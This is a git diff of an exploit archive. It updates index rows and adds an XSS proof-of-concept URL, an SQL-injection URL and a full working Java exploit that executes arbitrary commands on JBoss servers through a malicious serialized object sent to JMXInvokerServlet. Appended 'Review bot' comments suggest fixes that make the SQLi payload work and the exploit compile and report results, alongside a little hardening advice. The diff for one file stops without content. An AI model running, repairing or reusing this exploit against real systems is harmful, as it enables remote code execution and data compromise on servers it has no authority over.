diff --git a/files.csv b/files.csv index b2759eed5..ddb4ecfb6 100755 --- a/files.csv +++ b/files.csv @@ -5252,7 +5252,7 @@ id,file,description,date,author,platform,type,port 5626,platforms/php/webapps/5626.txt,"68 Classifieds 4.0 (category.php cat) SQL Injection Vulnerability",2008-05-15,HaCkeR_EgY,php,webapps,0 5627,platforms/php/webapps/5627.pl,"Pet Grooming Management System <= 2.0 - Arbitrary Add-Admin Exploit",2008-05-15,t0pP8uZz,php,webapps,0 5628,platforms/php/webapps/5628.txt,"RantX 1.0 Insecure Admin Authentication Vulnerability",2008-05-15,t0pP8uZz,php,webapps,0 -5629,platforms/php/webapps/5629.txt,"Web Slider <= 0.6 Insecure Cookie/Authentication Handling Vuln",2008-05-15,t0pP8uZz,php,webapps,0 +5629,platforms/php/webapps/5629.txt,"Web Slider <= 0.6 - Insecure Cookie/Authentication Handling Vuln",2008-05-15,t0pP8uZz,php,webapps,0 5630,platforms/php/webapps/5630.txt,"Multi-Page Comment System 1.1.0 Insecure Cookie Handling Vulnerability",2008-05-15,t0pP8uZz,php,webapps,0 5631,platforms/php/webapps/5631.txt,"IMGallery 2.5 Multiply Remote SQL Injection Vulnerabilities",2008-05-15,cOndemned,php,webapps,0 5632,platforms/multiple/remote/5632.rb,"Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (ruby)",2008-05-16,L4teral,multiple,remote,22 
@@ -28757,7 +28757,7 @@ id,file,description,date,author,platform,type,port 31988,platforms/windows/local/31988.rb,"Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow",2014-02-28,metasploit,windows,local,0 31989,platforms/php/webapps/31989.txt,"webERP 4.11.3 (SalesInquiry.php, SortBy param) - SQL Injection Vulnerability",2014-02-28,HauntIT,php,webapps,80 31990,platforms/multiple/webapps/31990.txt,"SpagoBI 4.0 - Privilege Escalation Vulnerability",2014-02-28,"Christian Catalano",multiple,webapps,0 -31991,platforms/windows/local/31991.rb,"VCDGear 3.50 - (.cue) Stack Buffer Overflow Exploit",2014-02-28,"Juan Sacco",windows,local,0 +31991,platforms/windows/local/31991.rb,"VCDGear 3.50 - (.cue) Stack Buffer Overflow Exploit",2014-02-28,Provensec,windows,local,0 31992,platforms/windows/webapps/31992.txt,"Oracle Demantra 12.2.1 - Arbitrary File Disclosure",2014-03-01,Portcullis,windows,webapps,0 31993,platforms/windows/webapps/31993.txt,"Oracle Demantra 12.2.1 - SQL Injection Vulnerability",2014-03-01,Portcullis,windows,webapps,8080 31994,platforms/windows/webapps/31994.txt,"Oracle Demantra 12.2.1 - Stored XSS Vulnerability",2014-03-01,Portcullis,windows,webapps,8080 
@@ -30577,7 +30577,7 @@ id,file,description,date,author,platform,type,port 33949,platforms/linux/remote/33949.txt,"PCRE <= 6.2 Regular Expression Compiling Workspace Buffer Overflow Vulnerability",2010-05-06,"Michael Santos",linux,remote,0 33950,platforms/php/webapps/33950.txt,"HAWHAW 'newsread.php' SQL Injection Vulnerability",2010-01-31,s4r4d0,php,webapps,0 33951,platforms/windows/dos/33951.txt,"Baidu Spark Browser 26.5.9999.3511 - Remote Stack Overflow Vulnerability (DoS)",2014-07-02,LiquidWorm,windows,dos,0 -33953,platforms/php/webapps/33953.txt,"Zurmo CRM - Persistent XSS Vulnerability",2014-07-02,"Juan Sacco",php,webapps,80 +33953,platforms/php/webapps/33953.txt,"Zurmo CRM - Persistent XSS Vulnerability",2014-07-02,Provensec,php,webapps,80 33954,platforms/php/webapps/33954.txt,"Kerio Control 8.3.1 - Blind SQL Injection",2014-07-02,"Khashayar Fereidani",php,webapps,4081 33957,platforms/php/webapps/33957.txt,"kloNews 2.0 - 'cat.php' Cross-Site Scripting Vulnerability",2010-01-20,"cr4wl3r ",php,webapps,0 33958,platforms/cgi/webapps/33958.txt,"Digital Factory Publique! 2.3 - 'sid' Parameter SQL Injection Vulnerability",2010-05-06,"Christophe de la Fuente",cgi,webapps,0 
@@ -31176,7 +31176,7 @@ id,file,description,date,author,platform,type,port 34620,platforms/php/webapps/34620.txt,"PaysiteReviewCMS image.php image Parameter XSS",2010-09-14,"Valentin Hoebel",php,webapps,0 34621,platforms/unix/remote/34621.c,"Mozilla Firefox <= 3.6.8 - 'Math.random()' Cross Domain Information Disclosure Vulnerability",2010-09-14,"Amit Klein",unix,remote,0 34622,platforms/windows/remote/34622.txt,"Axigen Webmail 1.0.1 - Directory Traversal Vulnerability",2010-09-15,"Bogdan Calin",windows,remote,0 -34624,platforms/php/webapps/34624.txt,"OroCRM - Stored XSS Vulnerability",2014-09-11,"Juan Sacco",php,webapps,80 +34624,platforms/php/webapps/34624.txt,"OroCRM - Stored XSS Vulnerability",2014-09-11,Provensec,php,webapps,80 34625,platforms/php/webapps/34625.py,"Joomla Spider Contacts 1.3.6 (index.php, contacts_id param) - SQL Injection",2014-09-11,"Claudio Viviani",php,webapps,80 34626,platforms/ios/webapps/34626.txt,"Photorange 1.0 iOS - File Inclusion Vulnerability",2014-09-11,Vulnerability-Lab,ios,webapps,9900 34627,platforms/ios/webapps/34627.txt,"ChatSecure IM 2.2.4 iOS - Persistent XSS Vulnerability",2014-09-11,Vulnerability-Lab,ios,webapps,0 
@@ -31875,7 +31875,7 @@ id,file,description,date,author,platform,type,port 35382,platforms/android/dos/35382.txt,"Android WAPPushManager - SQL Injection",2014-11-26,"Baidu X-Team",android,dos,0 35383,platforms/cgi/webapps/35383.rb,"Device42 WAN Emulator 2.3 Traceroute Command Injection",2014-11-26,"Brandon Perry",cgi,webapps,80 35384,platforms/cgi/webapps/35384.rb,"Device42 WAN Emulator 2.3 Ping Command Injection",2014-11-26,"Brandon Perry",cgi,webapps,80 -35385,platforms/php/webapps/35385.pl,"Wordpress Plugin Slider Revolution/Showbiz Pro - Shell Upload Exploit",2014-11-26,"Simo Ben Youssef",php,webapps,80 +35385,platforms/php/webapps/35385.pl,"Wordpress Plugin Slider Revolution 3.0.95 /Showbiz Pro 1.7.1 - Shell Upload Exploit",2014-11-26,"Simo Ben Youssef",php,webapps,80 35386,platforms/linux/remote/35386.txt,"Logwatch Log File Special Characters Local Privilege Escalation Vulnerability",2011-02-24,"Dominik George",linux,remote,0 35387,platforms/php/webapps/35387.txt,"phpShop 0.8.1 - 'page' Parameter Cross-Site Scripting Vulnerability",2011-02-25,"Aung Khant",php,webapps,0 35391,platforms/php/webapps/35391.txt,"glFusion 1.1.x/1.2.1 - 'users.php' SQL Injection Vulnerability",2011-02-25,H3X,php,webapps,0 
@@ -32760,8 +32760,8 @@ id,file,description,date,author,platform,type,port 36331,platforms/php/webapps/36331.txt,"Dolibarr ERP/CRM /user/index.php Multiple Parameter SQL Injection",2011-11-23,"High-Tech Bridge SA",php,webapps,0 36332,platforms/php/webapps/36332.txt,"Dolibarr ERP/CRM /user/info.php id Parameter SQL Injection",2011-11-23,"High-Tech Bridge SA",php,webapps,0 36333,platforms/php/webapps/36333.txt,"Dolibarr ERP/CRM /admin/boxes.php rowid Parameter SQL Injection",2011-11-23,"High-Tech Bridge SA",php,webapps,0 -36334,platforms/windows/dos/36334.txt,"Foxit Products GIF Conversion Memory Corruption (LZWMinimumCodeSize)",2015-03-11,"Francis Provencher",windows,dos,0 -36335,platforms/windows/dos/36335.txt,"Foxit Products GIF Conversion Memory Corruption (DataSubBlock)",2015-03-11,"Francis Provencher",windows,dos,0 +36334,platforms/windows/dos/36334.txt,"Foxit Products GIF Conversion - Memory Corruption (LZWMinimumCodeSize)",2015-03-11,"Francis Provencher",windows,dos,0 +36335,platforms/windows/dos/36335.txt,"Foxit Products GIF Conversion - Memory Corruption (DataSubBlock)",2015-03-11,"Francis Provencher",windows,dos,0 36336,platforms/windows/dos/36336.txt,"Microsoft Windows Text Services Memory Corruption (MS15-020)",2015-03-11,"Francis Provencher",windows,dos,0 36337,platforms/linux/remote/36337.py,"ElasticSearch Unauthenticated Remote Code Execution",2015-03-11,"Xiphos Research Ltd",linux,remote,9200 36338,platforms/php/webapps/36338.txt,"WordPress ClickDesk Live Support Plugin 2.0 'cdwidget' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0 
@@ -32841,7 +32841,7 @@ id,file,description,date,author,platform,type,port 36419,platforms/multiple/webapps/36419.txt,"Metasploit Project < 4.11.1 - Initial User Creation CSRF",2015-03-17,"Mohamed Abdelbaset Elnoby",multiple,webapps,3790 36420,platforms/windows/remote/36420.rb,"Adobe Flash Player PCRE Regex Vulnerability",2015-03-17,metasploit,windows,remote,0 36421,platforms/linux/remote/36421.rb,"Exim GHOST (glibc gethostbyname) Buffer Overflow",2015-03-18,"Qualys Corporation",linux,remote,25 -36422,platforms/windows/dos/36422.txt,"Fortinet Single Sign On Stack Overflow",2015-03-18,"Core Security",windows,dos,8000 +36422,platforms/windows/dos/36422.txt,"Fortinet Single Sign On - Stack Overflow",2015-03-18,"Core Security",windows,dos,8000 36423,platforms/java/webapps/36423.txt,"Websense Appliance Manager Command Injection Vulnerability",2015-03-18,"Han Sahin",java,webapps,9447 36424,platforms/windows/local/36424.txt,"Windows 8.1 - Local WebDAV NTLM Reflection Elevation of Privilege",2015-03-19,"Google Security Research",windows,local,0 36425,platforms/linux/dos/36425.txt,"Linux Kernel Network Namespace Remote Denial of Service Vulnerability",2011-12-06,"Serge Hallyn",linux,dos,0 
@@ -32850,7 +32850,7 @@ id,file,description,date,author,platform,type,port 36428,platforms/hardware/remote/36428.txt,"Axis M10 Series Network Cameras Cross Site Scripting Vulnerability",2011-12-07,"Matt Metzger",hardware,remote,0 36429,platforms/hardware/remote/36429.txt,"HomeSeer HS2 2.5.0.20 Web Interface Log Viewer Page URI XSS",2011-12-08,"Silent Dream",hardware,remote,0 36430,platforms/linux/local/36430.sh,"HP Application Lifestyle Management 11 'GetInstalledPackages' Local Privilege Escalation Vulnerability",2011-12-08,anonymous,linux,local,0 -36431,platforms/windows/dos/36431.pl,"FastStone Image Viewer 5.3 .tga Crash PoC",2015-03-19,"ITDefensor Vulnerability Research Team",windows,dos,0 +36431,platforms/windows/dos/36431.pl,"FastStone Image Viewer 5.3 - (.tga) Crash PoC",2015-03-19,"ITDefensor Vulnerability Research Team",windows,dos,0 36432,platforms/php/webapps/36432.txt,"Pet Listing 'preview.php' Cross Site Scripting Vulnerability",2011-12-09,Mr.PaPaRoSSe,php,webapps,0 36433,platforms/windows/dos/36433.txt,"Yahoo! CD Player ActiveX Control 'open()' Method Stack Buffer Overflow Vulnerability",2011-04-20,shinnai,windows,dos,0 36434,platforms/php/webapps/36434.txt,"WordPress GRAND FlAGallery Plugin 1.57 'flagshow.php' Cross Site Scripting Vulnerability",2011-12-12,Am!r,php,webapps,0 
@@ -32918,11 +32918,11 @@ id,file,description,date,author,platform,type,port 36498,platforms/php/webapps/36498.txt,"Yaws 1.88 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-01-05,SiteWatch,php,webapps,0 36499,platforms/php/webapps/36499.txt,"StatIt 4 'statistik.php' Multiple Cross Site Scripting Vulnerabilities",2012-01-04,sonyy,php,webapps,0 36500,platforms/windows/remote/36500.txt,"HServer 0.1.1 Directory Traversal Vulnerability",2012-01-05,demonalex,windows,remote,0 -36501,platforms/windows/local/36501.py,"Mini-stream Ripper v2.7.7.100 Local Buffer Overflow",2015-03-26,"TUNISIAN CYBER",windows,local,0 -36502,platforms/windows/local/36502.py,"RM Downloader 2.7.5.400 Local Buffer Overflow",2015-03-26,"TUNISIAN CYBER",windows,local,0 -36503,platforms/hardware/remote/36503.rb,"QNAP admin shell via Bash Environment Variable Code Injection",2015-03-26,"Patrick Pellegrino",hardware,remote,9993 -36504,platforms/hardware/remote/36504.rb,"QNAP Web Server Remote Code Execution via Bash Environment Variable Code Injection",2015-03-26,"Patrick Pellegrino",hardware,remote,0 -36505,platforms/windows/remote/36505.txt,"WebGate eDVR Manager Stack Buffer Overflow",2015-03-26,"Praveen Darshanam",windows,remote,0 +36501,platforms/windows/local/36501.py,"Mini-stream Ripper 2.7.7.100 - Local Buffer Overflow",2015-03-26,"TUNISIAN CYBER",windows,local,0 +36502,platforms/windows/local/36502.py,"RM Downloader 2.7.5.400 - Local Buffer Overflow",2015-03-26,"TUNISIAN CYBER",windows,local,0 +36503,platforms/hardware/remote/36503.rb,"QNAP - Admin Shell via Bash Environment Variable Code Injection",2015-03-26,"Patrick Pellegrino",hardware,remote,9993 +36504,platforms/hardware/remote/36504.rb,"QNAP - Web Server Remote Code Execution via Bash Environment Variable Code Injection",2015-03-26,"Patrick Pellegrino",hardware,remote,0 +36505,platforms/windows/remote/36505.txt,"WebGate eDVR Manager - Stack Buffer Overflow",2015-03-26,"Praveen Darshanam",windows,remote,0 
36506,platforms/php/webapps/36506.txt,"pfSense 2.2 - Multiple Vulnerabilities",2015-03-26,"High-Tech Bridge SA",php,webapps,0 36507,platforms/windows/remote/36507.txt,"Microsoft AntiXSS 3/4.0 Library Sanitization Module Security Bypass Vulnerability",2012-01-10,"Adi Cohen",windows,remote,0 36508,platforms/php/webapps/36508.txt,"VertrigoServ 2.25 'extensions.php' Script Cross Site Scripting Vulnerability",2012-01-05,"Stefan Schurtz",php,webapps,0 
@@ -32934,10 +32934,10 @@ id,file,description,date,author,platform,type,port 36514,platforms/windows/remote/36514.pl,"IPtools 0.1.4 Remote Command Server Buffer Overflow Vulnerability",2012-01-06,demonalex,windows,remote,0 36515,platforms/asp/webapps/36515.txt,"DIGIT CMS 1.0.7 Cross Site Scripting and SQL Injection Vulnerabilities",2012-01-07,"BHG Security Center",asp,webapps,0 36516,platforms/windows/remote/36516.py,"Acunetix <=9.5 - OLE Automation Array Remote Code Execution",2015-03-27,"Naser Farhadi",windows,remote,0 -36517,platforms/windows/remote/36517.html,"WebGate WinRDS 2.0.8 StopSiteAllChannel Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote,0 -36518,platforms/windows/remote/36518.html,"WebGate Control Center 4.8.7 GetThumbnail Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote,0 -36519,platforms/windows/remote/36519.html,"WebGate eDVR Manager 2.6.4 SiteName Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote,0 -36520,platforms/php/webapps/36520.txt,"Berta CMS File Upload Bypass",2015-03-27,"Simon Waters",php,webapps,80 +36517,platforms/windows/remote/36517.html,"WebGate WinRDS 2.0.8 - StopSiteAllChannel Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote,0 +36518,platforms/windows/remote/36518.html,"WebGate Control Center 4.8.7 - GetThumbnail Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote,0 +36519,platforms/windows/remote/36519.html,"WebGate eDVR Manager 2.6.4 - SiteName Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote,0 +36520,platforms/php/webapps/36520.txt,"Berta CMS - File Upload Bypass",2015-03-27,"Simon Waters",php,webapps,80 36521,platforms/php/webapps/36521.txt,"Atar2b CMS 4.0.1 gallery_e.php id Parameter SQL Injection",2012-01-07,"BHG Security Center",php,webapps,0 36522,platforms/php/webapps/36522.txt,"Atar2b CMS 4.0.1 pageH.php id Parameter SQL Injection",2012-01-07,"BHG Security Center",php,webapps,0 36523,platforms/php/webapps/36523.txt,"Atar2b CMS 4.0.1 pageE.php id 
Parameter SQL Injection",2012-01-07,"BHG Security Center",php,webapps,0 @@ -32950,6 +32950,7 @@ id,file,description,date,author,platform,type,port 36530,platforms/php/webapps/36530.txt,"ClipBucket 2.6 view_item.php type Parameter XSS",2012-01-09,YaDoY666,php,webapps,0 36531,platforms/php/webapps/36531.txt,"ClipBucket 2.6 videos.php time Parameter SQL Injection",2012-01-09,YaDoY666,php,webapps,0 36532,platforms/php/webapps/36532.txt,"ClipBucket 2.6 channels.php time Parameter SQL Injection",2012-01-09,YaDoY666,php,webapps,0 +36533,platforms/windows/local/36533.py,"IDM 6.20 - Local Buffer Overflow",2015-03-28,"TUNISIAN CYBER",windows,local,0 36534,platforms/php/webapps/36534.txt,"MARINET CMS room2.php roomid Parameter SQL Injection",2012-01-09,"H4ckCity Security Team",php,webapps,0 36535,platforms/php/webapps/36535.txt,"MARINET CMS galleryphoto.php id Parameter SQL Injection",2012-01-09,"H4ckCity Security Team",php,webapps,0 36536,platforms/php/webapps/36536.txt,"MARINET CMS gallery.php id Parameter SQL Injection",2012-01-09,"H4ckCity Security Team",php,webapps,0 
@@ -32958,6 +32959,30 @@ id,file,description,date,author,platform,type,port 36539,platforms/php/webapps/36539.txt,"Advanced File Management 1.4 'users.php' Cross Site Scripting Vulnerability",2012-01-09,Am!r,php,webapps,0 36540,platforms/php/webapps/36540.txt,"WordPress Age Verification plugin 0.4 'redirect_to' Parameter URI Redirection Vulnerability",2012-01-10,"Gianluca Brindisi",php,webapps,0 36541,platforms/php/webapps/36541.txt,"PHP-Fusion 7.2.4 'downloads.php' Cross Site Scripting Vulnerability",2012-01-10,Am!r,php,webapps,0 +36542,platforms/windows/remote/36542.txt,"ExpressView Browser Plug-in 6.5.0.3330 - Multiple Integer Overflow and Remote Code Execution Vulnerabilities",2012-01-11,"Luigi Auriemma",windows,remote,0 36543,platforms/php/webapps/36543.txt,"KnowledgeTree 3.x Multiple Cross Site Scripting Vulnerabilities",2012-01-11,"High-Tech Bridge SA",php,webapps,0 36544,platforms/php/webapps/36544.txt,"Kayako SupportSuite 3.x Multiple Vulnerabilities",2012-01-11,"Yuri Goltsev",php,webapps,0 36545,platforms/linux/dos/36545.txt,"Linux Kernel <= 3.1.8 KVM Local Denial of Service Vulnerability",2011-12-29,"Stephan Sattler",linux,dos,0 +36546,platforms/windows/remote/36546.txt,"GreenBrowser 6.0.1002 - Search Bar Short Cut Button Double Free Remote Memory Corruption Vulnerability",2012-01-12,NCNIPC,windows,remote,0 +36547,platforms/asp/webapps/36547.txt,"MailEnable <= 6.02 'ForgottonPassword.aspx' Cross Site Scripting Vulnerability",2012-01-12,"Sajjad Pourali",asp,webapps,0 +36548,platforms/java/webapps/36548.txt,"Contus Job Portal 'Category' Parameter SQL Injection Vulnerability",2012-01-13,Lazmania61,java,webapps,0 +36549,platforms/php/webapps/36549.txt,"Joomla! 
HD Video Share Component 1.3 'id' Parameter SQL Injection Vulnerability",2012-01-12,Lazmania61,php,webapps,0 +36550,platforms/php/webapps/36550.txt,"PHP Membership Site Manager Script 2.1 'index.php' Cross Site Scripting Vulnerability",2012-01-16,Atmon3r,php,webapps,0 +36551,platforms/php/webapps/36551.txt,"PHP Ringtone Website 'ringtones.php' Multiple Cross Site Scripting Vulnerabilities",2012-01-15,Atmon3r,php,webapps,0 +36552,platforms/php/webapps/36552.txt,"BoltWire 3.4.16 Multiple 'index.php' Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0 +36553,platforms/java/webapps/36553.java,"JBoss JMXInvokerServlet JMXInvoker 0.3 - Remote Command Execution",2015-03-30,ikki,java,webapps,0 +36554,platforms/php/webapps/36554.txt,"Wordpress Plugin Slider Revolution <= 4.1.4 - Arbitrary File Download vulnerability",2015-03-30,"Claudio Viviani",php,webapps,0 +36555,platforms/windows/local/36555.c,"BZR Player 1.03 - DLL Hijacking",2015-03-30,"TUNISIAN CYBER",windows,local,0 +36556,platforms/windows/local/36556.c,"ZIP Password Recovery Professional 7.1 - DLL Hijacking",2015-03-30,"TUNISIAN CYBER",windows,local,0 +36557,platforms/windows/local/36557.txt,"HTTrack Website Copier 3.48-21 - DLL Hijacking",2015-03-30,"TUNISIAN CYBER",windows,local,0 +36558,platforms/windows/local/36558.txt,"UltraISO 9.6.2.3059 - DLL Hijacking",2015-03-30,"TUNISIAN CYBER",windows,local,0 +36559,platforms/php/webapps/36559.txt,"Wordpress aspose-doc-exporter Plugin 1.0 - Arbitrary File Download Vulnerability",2015-03-30,ACC3SS,php,webapps,0 +36560,platforms/php/webapps/36560.txt,"Joomla Gallery WD Component - SQL Injection Vulnerability",2015-03-30,"Crash bandicot",php,webapps,0 +36561,platforms/php/webapps/36561.txt,"Joomla Contact Form Maker 1.0.1 Component - SQL injection vulnerability",2015-03-30,"TUNISIAN CYBER",php,webapps,0 +36563,platforms/php/webapps/36563.txt,"Joomla Gallery WD - SQL Injection Vulnerability",2015-03-30,"Crash bandicot",php,webapps,0 
+36564,platforms/linux/local/36564.txt,"Fedora21 setroubleshootd Local Root PoC",2015-03-30,"Sebastian Krahmer",linux,local,0 +36565,platforms/php/webapps/36565.txt,"ATutor 2.0.3 Multiple Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0 +36566,platforms/php/webapps/36566.txt,"Beehive Forum 101 Multiple Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0 +36567,platforms/php/webapps/36567.txt,"phpVideoPro 0.8.x/0.9.7 Multiple Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0 +36568,platforms/php/webapps/36568.txt,"Giveaway Manager 'members.php' Cross Site Scripting Vulnerability",2012-01-16,Am!r,php,webapps,0 +36569,platforms/php/webapps/36569.txt,"Annuaire PHP 'sites_inscription.php' Multiple Cross Site Scripting Vulnerabilities",2012-01-16,Atmon3r,php,webapps,0 diff --git a/platforms/asp/webapps/36547.txt b/platforms/asp/webapps/36547.txt new file mode 100755 index 000000000..71ebacf02 --- /dev/null +++ b/platforms/asp/webapps/36547.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/51401/info + +MailEnable is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +The following MailEnable versions are vulnerable: +Professional, Enterprise, and Premium 4.26 and prior versions +Professional, Enterprise, and Premium 5.52 and prior versions +Professional, Enterprise, and Premium 6.02 and prior versions + +http://example.com/mewebmail/Mondo/lang/sys/ForgottenPassword.aspx?Username=[xss] \ No newline at end of file diff --git a/platforms/java/webapps/36548.txt b/platforms/java/webapps/36548.txt new file mode 100755 index 000000000..93ce9d06d --- /dev/null 
+++ b/platforms/java/webapps/36548.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51404/info
+
+Contus Job Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/demo/jobresult?searchname=quickjobsearch&Keywords=&Location=&Category=16â??A
\ No newline at end of file
diff --git a/platforms/java/webapps/36553.java b/platforms/java/webapps/36553.java
new file mode 100755
index 000000000..e7e9960cd
--- /dev/null
+++ b/platforms/java/webapps/36553.java
@@ -0,0 +1,169 @@
+/*
+ * JBoss JMXInvokerServlet Remote Command Execution
+ * JMXInvoker.java v0.3 - Luca Carettoni @_ikki
+ *
+ * This code exploits a common misconfiguration in JBoss Application Server (4.x, 5.x, ...).
+ * Whenever the JMX Invoker is exposed with the default configuration, a malicious "MarshalledInvocation"
+ * serialized Java object allows to execute arbitrary code. This exploit works even if the "Web-Console"
+ * and the "JMX Console" are protected or disabled.
+ *
+ * [FAQ]
+ *
+ * Q: Is my target vulnerable?
+ * A: If http://:8080/invoker/JMXInvokerServlet exists, it's likely exploitable
+ *
+ * Q: How to fix it?
+ * A: Enable authentication in "jmx-invoker-service.xml"
+ *
+ * Q: Is this exploit version-dependent?
+ * A: Unfortunately, yes. An hash value is used to properly invoke a method.
+ * At least comparing version 4.x and 5.x, these hashes are different.
+ *
+ * Q: How to compile and launch it?
+ * A: javac -cp ./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker.java
+ * java -cp .:./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker
+ * Yes, it's a Java exploit. I can already see some of you complaining....
+ */
+
+import java.io.BufferedReader;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.InputStreamReader;
+import java.io.ObjectOutputStream;
+import java.lang.reflect.Array;
+import java.lang.reflect.Field;
+import java.lang.reflect.Method;
+import java.net.ConnectException;
+import java.net.HttpURLConnection;
+import java.net.URL;
+import javax.management.MalformedObjectNameException;
+import javax.management.ObjectName;
+import org.jboss.invocation.MarshalledInvocation; //within jboss.jar (look into the original JBoss installation dir)
+
+public class JMXInvokerServlet {
+
+    //---------> CHANGE ME <---------
+    static final int hash = 647347722; //Weaponized against JBoss 4.0.3SP1
+    static final String url = "http://127.0.0.1:8080/invoker/JMXInvokerServlet";
+    static final String cmd = "touch /tmp/exectest";
+    //-------------------------------
+
+    public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, MalformedObjectNameException {
+
+        System.out.println("\n--[ JBoss JMXInvokerServlet Remote Command Execution ]");
+
+        //Create a malicious Java serialized object
+        MarshalledInvocation payload = new MarshalledInvocation();
+        payload.setObjectName(new Integer(hash));
+
+        //Executes the MBean invoke operation
+        Class c = Class.forName("javax.management.MBeanServerConnection");
+        Method method = c.getDeclaredMethod("invoke", javax.management.ObjectName.class, java.lang.String.class, java.lang.Object[].class, java.lang.String[].class);
+        payload.setMethod(method);
+
+        //Define MBean's name, operation and pars
+        Object myObj[] = new Object[4];
+        //MBean object name
+        myObj[0] = new ObjectName("jboss.deployer:service=BSHDeployer");
+        //Operation name
+        myObj[1] = new String("createScriptDeployment");
+        //Actual parameters
+        myObj[2] = new String[]{"Runtime.getRuntime().exec(\"" + cmd + "\");", "Script Name"};
+        //Operation signature
+        myObj[3] = new String[]{"java.lang.String", "java.lang.String"};
+
+        payload.setArguments(myObj);
+        System.out.println("\n--[*] MarshalledInvocation object created");
+        //For debugging - visualize the raw object
+        //System.out.println(dump(payload));
+
+        //Serialize the object
+        try {
+            //Send the payload
+            URL server = new URL(url);
+            HttpURLConnection conn = (HttpURLConnection) server.openConnection();
+            conn.setRequestMethod("POST");
+            conn.setDoOutput(true);
+            conn.setDoInput(true);
+            conn.setUseCaches(false);
+            conn.setRequestProperty("Accept", "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2");
+            conn.setRequestProperty("Connection", "keep-alive");
+            conn.setRequestProperty("User-Agent", "Java/1.6.0_06");
+            conn.setRequestProperty("Content-Type", "application/octet-stream");
+            conn.setRequestProperty("Accept-Encoding", "x-gzip,x-deflate,gzip,deflate");
+            conn.setRequestProperty("ContentType", "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation");
+
+            ObjectOutputStream wr = new ObjectOutputStream(conn.getOutputStream());
+            wr.writeObject(payload);
+            System.out.println("\n--[*] MarshalledInvocation object serialized");
+            System.out.println("\n--[*] Sending payload...");
+            wr.flush();
+            wr.close();
+
+            //Get the response
+            InputStream is = conn.getInputStream();
+            BufferedReader rd = new BufferedReader(new InputStreamReader(is));
+            String line;
+            StringBuffer response = new StringBuffer();
+            while ((line = rd.readLine()) != null) {
+                response.append(line);
+            }
+            rd.close();
+
+            if (response.indexOf("Script Name") != -1) {
+                System.out.println("\n--[*] \"" + cmd + "\" successfully executed");
+            } else {
+                System.out.println("\n--[!] An invocation error occured...");
+            }
+        } catch (ConnectException cex) {
+            System.out.println("\n--[!] A connection error occured...");
+        } catch (IOException ex) {
+            ex.printStackTrace();
+        }
+    }
+
+    /*
+     * Raw dump of generic Java Objects
+     */
+    static String dump(Object o) {
+        StringBuffer buffer = new StringBuffer();
+        Class oClass = o.getClass();
+
+        if (oClass.isArray()) {
+            buffer.append("[");
+
+            for (int i = 0; i < Array.getLength(o); i++) {
+                if (i > 0) {
+                    buffer.append(",\n");
+                }
+                Object value = Array.get(o, i);
+                buffer.append(value.getClass().isArray() ? dump(value) : value);
+            }
+            buffer.append("]");
+        } else {
+            buffer.append("{");
+            while (oClass != null) {
+                Field[] fields = oClass.getDeclaredFields();
+                for (int i = 0; i
+                        < fields.length; i++) {
+                    if (buffer.length() > 1) {
+                        buffer.append(",\n");
+                    }
+                    fields[i].setAccessible(true);
+                    buffer.append(fields[i].getName());
+                    buffer.append("=");
+                    try {
+                        Object value = fields[i].get(o);
+                        if (value != null) {
+                            buffer.append(value.getClass().isArray() ? dump(value) : value);
+                        }
+                    } catch (IllegalAccessException e) {
+                    }
+                }
+                oClass = oClass.getSuperclass();
+            }
+            buffer.append("}");
+        }
+        return buffer.toString();
+    }
+}
diff --git a/platforms/linux/local/36564.txt b/platforms/linux/local/36564.txt
new file mode 100755
index 000000000..71a6efc60
--- /dev/null
+++ b/platforms/linux/local/36564.txt
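Review bot: The PoC request `Category=16â??A` has lost its injection character to mis-encoding, so as published it does not reproduce anything; the three-byte `â??` pattern is consistent with a UTF-8 typographic quote (U+2019) rendered byte-wise, which suggests a tester should substitute an ASCII `'` and confirm against the SecurityFocus source at bid/51404. Even with the quote restored the request only provokes a database error rather than demonstrating extraction, so a one-line caveat such as `payload only triggers a SQL error; confirm with a boolean- or time-based probe before reporting` would set expectations for anyone using this entry.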
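Review bot: The class is declared `public class JMXInvokerServlet`, yet the header comment names the file JMXInvoker.java and the FAQ builds and runs it as `javac ... JMXInvoker.java` / `java ... JMXInvoker`; a public class must live in a file of the same name, so the published instructions will neither compile the class under that name nor find it at launch. Rename it to `public class JMXInvoker` or change the FAQ to use `JMXInvokerServlet`. A second issue is the response handling: `conn.getInputStream()` throws IOException for HTTP status 400 and above, so a server-side invocation failure ends up in the `ex.printStackTrace()` branch and the `An invocation error occured...` message is effectively unreachable; reading the error body instead, `InputStream is = conn.getResponseCode() >= 400 ? conn.getErrorStream() : conn.getInputStream();`, lets the "Script Name" check do its job. The "How to fix it" answer could also mention that the servlet ships inside the http-invoker deployment, so removing that deployment when unused, or putting a security-constraint on `/JMXInvokerServlet/*` in its web.xml, is the usual hardening — confirm the exact file for the target's JBoss version.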
